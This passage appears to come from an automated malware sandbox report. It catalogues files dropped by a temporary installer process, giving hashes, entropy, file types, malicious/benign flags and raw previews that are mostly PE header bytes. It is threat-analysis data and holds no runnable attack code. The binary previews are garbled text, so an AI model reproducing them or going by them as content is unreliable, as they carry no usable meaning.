                                                                                                                                                                                                                                        SHA-512:CA5C1E29D7381754814FE155CC3BF9347D07944CBDA3062B24571546252235434AE107033B8EF80A9791074146D4E3EE691EF06F5657EE52ABF8188B7B53E5BD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y59..TW..TW..TW.k.,..TW..,...TW..,...TW..TV.TW..,...TW.k.:..TW..,...TW..,..YTW.:.)..TW..,...TW..,...TW.Rich.TW.........................PE..d.....Z.........." .........0............................................... .......N....@.........................................@...x.......P......................../...........................................................................................text............................... ..`.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):566704
                                                                                                                                                                                                                                        Entropy (8bit):6.494428734965787
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:M/Wn7JnU0QUgqtLe1fqSKnqEXG6IOaaal7wC/QaDWxncycIW6zuyLQEKZm+jWodj:yN59IW6zuAQEKZm+jWodEEY1u
                                                                                                                                                                                                                                        MD5:6DA7F4530EDB350CF9D967D969CCECF8
                                                                                                                                                                                                                                        SHA1:3E2681EA91F60A7A9EF2407399D13C1CA6AA71E9
                                                                                                                                                                                                                                        SHA-256:9FEE6F36547D6F6EA7CA0338655555DBA6BB0F798BC60334D29B94D1547DA4DA
                                                                                                                                                                                                                                        SHA-512:1F77F900215A4966F7F4E5D23B4AAAD203136CB8561F4E36F03F13659FE1FF4B81CAA75FEF557C890E108F28F0484AD2BAA825559114C0DAA588CF1DE6C1AFAB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y...................Z.........O.....O.....O.....O.....O.....O.6....O.....Rich...........................PE..d...%|.a.........." .....<...\.......)...................................................`A.........................................5..h...(...,............p...9...~...'......0.......T...............................8............P...............................text....;.......<.................. ..`.rdata..j....P.......@..............@..@.data...`:...0......................@....pdata...9...p...:...6..............@..@.rsrc................p..............@..@.reloc..0............t..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23944
                                                                                                                                                                                                                                        Entropy (8bit):5.991779991904571
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:fXt9apR9EFsN2iWcs5gWjcKLHRN7IVslGssA:fXK79EFsEHKAmS
                                                                                                                                                                                                                                        MD5:0832532FAB0D5C949AA0C65169AA9D61
                                                                                                                                                                                                                                        SHA1:26F1BEE679B7A6289B663C4FA4E65EBA33A234E8
                                                                                                                                                                                                                                        SHA-256:8731A93E519C2595C9FD489E6D9AC07E964448C0DA1C8EE9EE500A7989482617
                                                                                                                                                                                                                                        SHA-512:03147A59EE35FB3D2752D4C40741A39674CCD4474A575746BC574D2B2FAE1FD04F5AB9C2E02B0DC6268FC6AEE8FBB46DC4BF5FF23B5FCC4A0E9B847F57CA79D0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h...h...h.......h.......h......h......h...h...h......h......h......h...g..h......h..Rich.h..........................PE..d...*|.a.........." .........$.......................................................Y....`A........................................P?..L....@..x....p.......`.......:...#......|...@3..T............................3..8............0..0............................text............................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`.......0..............@..@.rsrc........p.......4..............@..@.reloc..|............8..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1001280
                                                                                                                                                                                                                                        Entropy (8bit):5.973788439232148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:NWJjEJM48ZDBXci9fHQEKZm+jWodEEw9N2:NWJjd48rJw
                                                                                                                                                                                                                                        MD5:37DC8CC78ECBCD12F27E665B70BAEFA7
                                                                                                                                                                                                                                        SHA1:46FB9910CC10C4C0C52B547700E1950CE233BE89
                                                                                                                                                                                                                                        SHA-256:B53ADD5B7BD6BB11FECC7BE159885D0B75736D02423C11EDC6EEB6F4BEA80F6C
                                                                                                                                                                                                                                        SHA-512:078B0B408510C07EAC85518F03A9E3FAC8E4C8E2E36CCB8CD26962498C7F5BEDBD79F7034AF3EBFEF9984F85D81C9032446B1B5C156B2174A769657EA0AB60A1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ey.T..w...w...w......w.......w.:Fv...w...v...w.:Ft...w.:Fs.N.w.:Fr.J.w.:Fw...w.:F....w.:Fu...w.Rich..w.........PE..d.....W.........." .....j..........p........................................`.......d....`A.........................................@..........P....@.......p..\.......@?...P..........T...........................`........................<..@....................text...uh.......j.................. ..`.rdata..............n..............@..@.data....:...0......................@....pdata..\....p.......:..............@..@.didat..h....0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):439
                                                                                                                                                                                                                                        Entropy (8bit):4.823425713064833
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:xr9UIm6eQNuuiqEUG1bkAddYMUEqRpXQu:t82NuVp1LzVypl
                                                                                                                                                                                                                                        MD5:2DB9E4993F5E2F0E57C329F9EAC3B990
                                                                                                                                                                                                                                        SHA1:E1BFA095969ED94A8C8CEBF15EB1C3CAB7654B47
                                                                                                                                                                                                                                        SHA-256:96BDBF6D9C20A2EE3249FBA5DAD3BF9BF7D14EAB3E3915EE75A11716BCB82F03
                                                                                                                                                                                                                                        SHA-512:9FBC870286643AFD636B37C3E4382F3DD2945E9C1D4F09EF7CDBA49B221D8F35D13C3228803469A7D929E81CF4751A78D934CA6A8A408A9A6B5A0D29E2A6CD99
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:module QtGraphicalEffects.private..plugin qtgraphicaleffectsprivate..classname QtGraphicalEffectsPlugin..FastGlow 1.0 FastGlow.qml..FastInnerShadow 1.0 FastInnerShadow.qml..FastMaskedBlur 1.0 FastMaskedBlur.qml..GaussianDirectionalBlur 1.0 GaussianDirectionalBlur.qml..GaussianGlow 1.0 GaussianGlow.qml..GaussianInnerShadow 1.0 GaussianInnerShadow.qml..GaussianMaskedBlur 1.0 GaussianMaskedBlur.qml..DropShadowBase 1.0 DropShadowBase.qml..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):858512
                                                                                                                                                                                                                                        Entropy (8bit):6.6801261433761185
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:oKI9x2m++aGCiJez1mfrq06cJKGv1DS7BQLG9Dp:U5BpCiy1mfu0RJKcDS7BQCl
                                                                                                                                                                                                                                        MD5:44823FB067EFDD3DC2F023B313AB263C
                                                                                                                                                                                                                                        SHA1:184ED6F663E2F4C67411BF2BF6DBC4BE3387005D
                                                                                                                                                                                                                                        SHA-256:225D432437DDF86B0F0685C424268ED65BFCBE1907CF4F1D7B1AE6A6CB575D80
                                                                                                                                                                                                                                        SHA-512:4A53156F203E8364D491A3B39E55EE41474473CB3C9CD9A14CDF9A357E8A9EB9DADC859C985CA40E07DC379B9BFDCDA4C94CCFF313DF63B20DE4CEF383E9C2F8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........H~.H~.H~.....J~.E,..F~.E,=.E~.E,<.L~.E,..L~.....M~.H~.]....=.I~...<.K~.....I~.E,..I~.....I~.RichH~.........................PE..L.....*f...........!.....d...........k.......................................P............@.........................0i..t....i..x.......H................).......U......8............................c..@...............h............................text....b.......d.................. ..`.rdata...............h..............@..@.data...h ...........z..............@....qtmetad............................@..P.rsrc...H...........................@..@.reloc...U.......V..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59280
                                                                                                                                                                                                                                        Entropy (8bit):6.661684357969902
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:EXDrY/MBgXY3MEYTn8V8GyMODlOcCUuPtxFDSpcfj07Lap4G0czcoYiYa2vC6AMB:k/Y1Y31YT8VmUXPzfj6/Grzco7VKxn
                                                                                                                                                                                                                                        MD5:1F56DEE8B92CD70362E61A54175A4D5A
                                                                                                                                                                                                                                        SHA1:0E4699EED2F03A7BCCC70199F532170C7F46BFBD
                                                                                                                                                                                                                                        SHA-256:6B22D65A71AA2157AB6D6AC55DD1187C5F08C002CE0DDA55917A6E389222256B
                                                                                                                                                                                                                                        SHA-512:65A1EFF33377B7B1D144835F441FDAE332FC36964B8FB6194EB2208A5BF0EFE4DA7EA14841049286137014333BFF760B8659B8BFBE063AD3D87B00182E7A7168
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.....................:....................8....s8..........s.....s9......>....s;....Rich...........PE..L.....*f...........!.....d...Z.......i....................................................@.................................h...........h................)..........p...8...............................@...............4............................text....c.......d.................. ..`.rdata...?.......@...h..............@..@.data...l...........................@....qtmetad............................@..P.rsrc...h...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1495
                                                                                                                                                                                                                                        Entropy (8bit):4.948463579667309
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:p9u9bxMSpcP61aeNetQRuzY78aDx82RvUGI7VjIYUoGgDCAQ:i9bKSp6FeNmQO7evUlvUngDa
                                                                                                                                                                                                                                        MD5:090612B1C921F2D7094D80F6430733D5
                                                                                                                                                                                                                                        SHA1:050025F1B573B53F30BD06AF0D30FA4ACDC66FA9
                                                                                                                                                                                                                                        SHA-256:BDEB1DB80E2F10CD4D78F165A7348C3F1F7DAB8F263941081A1F8DE8A921751F
                                                                                                                                                                                                                                        SHA-512:17F7641F266138519A63A4D6B493C72B5F39140CB2CFA73B07168F71C4D16BE8FD847C4BBDD045337B06741496D2C573F10CBF43B1D632491CBEA5EFC9946B29
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:[XShortcuts]..File\Open=Ctrl+O..File\Exit=Alt+X..View\FullScreen=Ctrl+E..Strings\FollowIn\Hex=..Strings\Demangle=..Strings\Edit\String=..Signatures\Copy\Name=..Signatures\Copy\Signature=..Signatures\Copy\Address=..Signatures\Copy\Offset=..Signatures\FollowIn\Hex=..Hex\DataInspector=..Hex\DataConvertor=..Hex\Multisearch=..Hex\DumpToFile=Ctrl+D..Hex\GoTo\Offset=Ctrl+G..Hex\GoTo\Address=..Hex\GoTo\Selection\Start=..Hex\GoTo\Selection\End=..Hex\Signature=..Hex\Find\String=Ctrl+F..Hex\Find\Signature=..Hex\Find\Value=..Hex\Find\Next=F3..Hex\Select\All=Ctrl+A..Hex\Copy\Data=..Hex\Copy\Offset=..Hex\Copy\Address=..Hex\FollowIn\Disasm=..Hex\FollowIn\MemoryMap=..Hex\FollowIn\Hex=..Hex\Edit\Hex=..Hex\Edit\Remove=..Hex\Edit\Resize=..Hex\Strings=..Disasm\DumpToFile=Ctrl+D..Disasm\GoTo\Offset=..Disasm\GoTo\Address=Ctrl+G..Disasm\GoTo\EntryPoint=E..Disasm\GoTo\References=X..Disasm\Signature=Shift+G..Disasm\Hex\Signature=S..Disasm\Find\String=Ctrl+F..Disasm\Find\Signature=..Disasm\Find\Value=..Disasm\F
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):103312
                                                                                                                                                                                                                                        Entropy (8bit):5.979453656708724
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:gT97/RgBXe/h21E4Vu/OQyHQZiKrnESg9RRL:gT9REUqxVu/faQgKHqX
                                                                                                                                                                                                                                        MD5:C0BDC27A46B7E062AD6F63B8451AAE13
                                                                                                                                                                                                                                        SHA1:ADBDE2D4F487D8792BA134EBDD2D0A0F6EDCE743
                                                                                                                                                                                                                                        SHA-256:C24C0D1191A1538206A49563FC57922022ED99829B1EBDD7891A06E234AFF20F
                                                                                                                                                                                                                                        SHA-512:294704A2728039B1BDB367502963F36D102D154FE965A3373BDCCBB8B015DD8CF9BA9C1C57FBEC6667330F41D7DFDE64F6D9D11CBC8E4E26E826FBAEAE7BC0F1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........'TJ.I.J.I.J.I.....R.I.....*.I.....B.I.C...K.I.C...M.I.J.H...I..m..K.I..m..I.I..m..K.I.G...K.I..m..K.I.RichJ.I.........PE..d.....`f.........." ................................................................3.....`......................................... A.......A..P.......4............j...)..........0...8............................7..p............................................text...K........................... ..`.orpc............................... ..`.rdata...z.......|..................@..@.data....?...P.......0..............@....pdata...............L..............@..@.rsrc...4............V..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):98224
                                                                                                                                                                                                                                        Entropy (8bit):6.452201564717313
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                                                                                                        MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                                                                                                        SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                                                                                                        SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                                                                                                        SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):44008
                                                                                                                                                                                                                                        Entropy (8bit):6.658320283903974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:qR2/DB8xoPdian7MGXWYMvtWsjv7XqWD8R0kD:qR29pVrXWBQ6ThwSkD
                                                                                                                                                                                                                                        MD5:E62522E067AACF9E7A4FAF928BFC3965
                                                                                                                                                                                                                                        SHA1:676105C373BF128A5B5700FF1F52486FD01E72B7
                                                                                                                                                                                                                                        SHA-256:4C6BD47550FD0DEB7C29B95448CD35D40950CF12D3510E6C26C2E297574D1324
                                                                                                                                                                                                                                        SHA-512:043F94AD6D2DF3751B2557A5E6F44613091950CCFC2065109ABD3C800C1EB95DACB262CE4DA9E95D8CEFD8161D06AE6009D192A0D702BE663F44E36DDB5223BE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ *..AD.AD.AD."..AD..&E.AD.9..AD.AE.AD..&G.AD..&@.AD..&A.AD..&D.AD..&..AD..&F.AD.Rich.AD.................PE..d....(.].........." .....:...2.......A....................................................`A.........................................f......\g..x....................j...A...........^..8...........................P^...............P..X............................text...d9.......:.................. ..`.rdata..p....P.......>..............@..@.data........p.......\..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc...............h..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):58928
                                                                                                                                                                                                                                        Entropy (8bit):6.210845696900253
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ZNVfaQtx0rrYIMhJygv8Vv8g+FB+iYB7E:nVCQt5Ibg47KB+tB7E
                                                                                                                                                                                                                                        MD5:9BB14D1464473D1F56AE1D24D6392E92
                                                                                                                                                                                                                                        SHA1:8B7AB1FB92B09D4AFC6F9D42E4D8AD5D1C8D0FD7
                                                                                                                                                                                                                                        SHA-256:BDDAB562C19FA28B2EF824ED6E18FF7D692B2196BC34FAE7895D9FAF51926C1A
                                                                                                                                                                                                                                        SHA-512:90029EBF849B2DA771DC7DCCBA392CD66E71CF77376F6279DD0864EFEBFC535E882CC63F0BC8EFE3B067AB3C6639BC70365915BBD8EA18EEB68BB22F866AC66D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........g.4.4.4U.|4.4`.5.4...5.4.4..4`.5.4`.5.4`.5...4`.5...4`.l4...4`.5...4Rich.4................PE..d....3.\.........." .....l...>.......n..............................................Zo....`A............................................\......P...............d.......0>..........p...T..............................................p............................text...wj.......l.................. ..`.rdata...".......$...p..............@..@.data...............................@....pdata..d...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):131920
                                                                                                                                                                                                                                        Entropy (8bit):6.0574531251583865
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
                                                                                                                                                                                                                                        MD5:F57FB935A9A76E151229F547C2204BBA
                                                                                                                                                                                                                                        SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                                                                                                                                                                                                                                        SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                                                                                                                                                                                                                                        SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27536
                                                                                                                                                                                                                                        Entropy (8bit):6.7311768831441015
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:wmsg2cM28YFcc9qltpD5+b0pHyYiYa2vCQcAMxkE7:wR7YFJqpIbSHy7Ve6xv
                                                                                                                                                                                                                                        MD5:9BE19993A9A1EC0FAFD72C974F75CA8F
                                                                                                                                                                                                                                        SHA1:0CADF3357CFEBBB10997C8B113A9D7A4E82FECE8
                                                                                                                                                                                                                                        SHA-256:A7037919282076F0DB53627154BCE3F5E787EA16C760FECCA00A5B0614F16121
                                                                                                                                                                                                                                        SHA-512:587B3D31CFF0E7D282136574A9EE5AC687DBEA3997455BC449AF4A24DD7C73EB82813BE3CCF4E6B2BC41360E03F79383972D182DFCF64E783440F622DF01A274
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%.v.D.%.D.%.D.%R..%.D.%...%.D.%..'%.D.%..&%.D.%...%.D.%:..%.D.%.D.%.D.%:.&%.D.%:..%.D.%...%.D.%:..%.D.%Rich.D.%........PE..L.....*f...........!..... ...".......%.......0...........................................@..........................7..y...,8.......p..P............B...).......... 1..8............................3..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........P.......6..............@....qtmetad.....`.......8..............@..P.rsrc...P....p.......:..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49268
                                                                                                                                                                                                                                        Entropy (8bit):7.996032002835928
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:DMM7WgDAShQzXj+0dgGTI0A9XsiTN1WMZR7/PeP8nzo3oCsCe2eZJtbiGx3i:DrPDAfbp5xqXsKXPmx3oCMfbiGxS
                                                                                                                                                                                                                                        MD5:8FD58F1FD430FCA2CD8F3CB6B5597892
                                                                                                                                                                                                                                        SHA1:DE00E7313D13EB684F87CF72687D665869E0446A
                                                                                                                                                                                                                                        SHA-256:0310A91F85E03C06D209BAC2BEA6911EBF26AF56BE1C715ABE76CFE597F0F697
                                                                                                                                                                                                                                        SHA-512:38B9F3DB432445517B882101DE804D660291F1649995AB5D3F7BF828E3200B79399CBA16A76FDC663B5F7F8CCD8D6C0D19D071847181CDF61A32706D2D9230E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o...K.,.qn...D..............T...3.2.T...3.2kC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .o*z.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T.."..f.....'......b~....9..a...-.s..T..eL{2.T...3.2m.....Od..8.5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....*Yt].5M".....z.8.\y..}=.~./.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o....Q..5.....4h. .`.'....pl....R.....$.o...H..........b..y<...:(..K........S.nr.JW..'.Y%.......O.K.n.B...J..-L.q..L......dZ.O..\.7b....2.6.d.Y...\..0......T.U..[.B.}.&#x.g..d.8..k.>.Gs!/&K!3..f...^...}.....i.Dr..Vy..0..StH.5..{......}.......^...."89..k...F.Y$......9L.LFU.t.....V........Jsz
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5676923
                                                                                                                                                                                                                                        Entropy (8bit):6.275861681921798
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:bvHzDf6dXE4A8rChULBDqifkxGVZVB2nz:rnmBDN4z
                                                                                                                                                                                                                                        MD5:2BFAE5A9C25EB28D8C281E420F8DC220
                                                                                                                                                                                                                                        SHA1:1824797CD8BC62628818066DB7E075616CCF2D33
                                                                                                                                                                                                                                        SHA-256:C5249A0DD9846F2AC173C6AAEE47DDD022DD498AF59AB53FD275FDA1966A16CB
                                                                                                                                                                                                                                        SHA-512:DA1FF02AA4AE9A090FE10730AB52693592B4830B169DB2ACF99EF0412EE4FCBC1A1E0E1A5B5E511E0A7470905058C67011A0B5F1CC7E69D043B4790273447AF9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:X!q...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X!q.....................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):943784
                                                                                                                                                                                                                                        Entropy (8bit):6.621472142472864
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                                                                                                                                                        MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                                                                                                        SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                                                                                                                                                        SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                                                                                                                                                        SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
